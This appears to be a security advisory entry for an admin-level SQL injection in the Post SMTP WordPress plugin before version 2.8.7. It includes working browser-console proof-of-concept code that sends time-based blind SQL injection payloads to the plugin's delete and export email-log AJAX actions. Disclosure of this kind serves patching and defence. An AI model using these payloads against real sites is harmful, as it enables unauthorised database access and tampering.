Post SMTP < 2.8.7 - Admin+ SQL Injection

2023-12-2100:00:00

Alex Sanford

ps-delete-email-logs

ps-export-email-logs

sql injection

admin+ security

wordpress

browser console

AI Score

7.3

Confidence

High

EPSS

0.001

Percentile

19.3%

JSON

Description The plugin does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin.

# In `ps-delete-email-logs` action:

Visit the Post SMTP > Email Log page and run the following code in the browser console:

nonce = document.getElementById('ps-email-log-nonce').value

await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-Fetch-Site": "same-origin"
    },
    "body": "action=ps-delete-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
    "method": "POST",
    "mode": "cors"
});

# In `ps-export-email-logs` action:

Visit the Post SMTP > Email Log page and run the following code in the browser console:

nonce = document.getElementById('ps-email-log-nonce').value

await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-Fetch-Site": "same-origin"
    },
    "body": "action=ps-export-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
    "method": "POST",
    "mode": "cors"
});